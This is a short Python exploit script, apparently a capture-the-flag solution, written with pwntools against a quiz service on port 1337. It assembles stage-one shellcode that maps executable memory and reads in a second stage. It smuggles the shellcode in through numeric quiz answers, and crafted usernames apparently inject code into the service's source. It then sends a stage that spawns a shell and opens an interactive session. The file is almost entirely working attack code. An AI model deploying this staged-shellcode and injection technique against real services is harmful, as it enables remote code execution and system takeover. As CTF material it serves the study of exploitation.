53 lines
1.3 KiB
Python
53 lines
1.3 KiB
Python
from pwn import *
|
|
context.arch = 'amd64'
|
|
|
|
import struct
|
|
|
|
stage1 = """
|
|
mov eax, 9
|
|
xor edi, edi
|
|
mov esi, 4096
|
|
or r8, -1
|
|
mov edx, 7
|
|
mov r10d, 33
|
|
xor r9d, r9d
|
|
syscall
|
|
mov edx, 4096
|
|
mov rsi, rax
|
|
push rax
|
|
xor eax, eax
|
|
syscall
|
|
ret
|
|
"""
|
|
stage1_bin = asm(stage1)
|
|
assert len(stage1_bin) == 46
|
|
stage1_bin = stage1_bin + b"\x00\x00"
|
|
stage1_payload = list(struct.unpack("<iiiiiiiiiiii", stage1_bin))
|
|
|
|
stage2 = shellcraft.linux.sh()
|
|
stage2_bin = asm(stage2).ljust(4096, b"\x00")
|
|
|
|
games = [
|
|
{"quiz": "miscgod", "username": "const//", "answers": [0]*12},
|
|
{"quiz": "miscgod", "username": "int//", "answers": [0]*12},
|
|
{"quiz": "miscgod", "username": "main[]", "answers": stage1_payload},
|
|
{"quiz": "miscgod", "username": ";//", "answers": [0]*12},
|
|
{"quiz": "pts.txt", "username": "hacked", "rawinput": stage2_bin},
|
|
]
|
|
|
|
def play_game(r, game):
|
|
r.sendlineafter(b"> ", b"1")
|
|
r.sendlineafter(b"> ", game["username"].encode())
|
|
r.sendlineafter(b"> ", game["quiz"].encode())
|
|
if "answers" in game:
|
|
for answer in game["answers"]:
|
|
r.sendlineafter(b"answer: ", str(answer).encode())
|
|
else:
|
|
r.send(game["rawinput"])
|
|
|
|
def run(host="localhost"):
|
|
r = remote(host, 1337)
|
|
for game in games:
|
|
play_game(r, game)
|
|
r.interactive()
|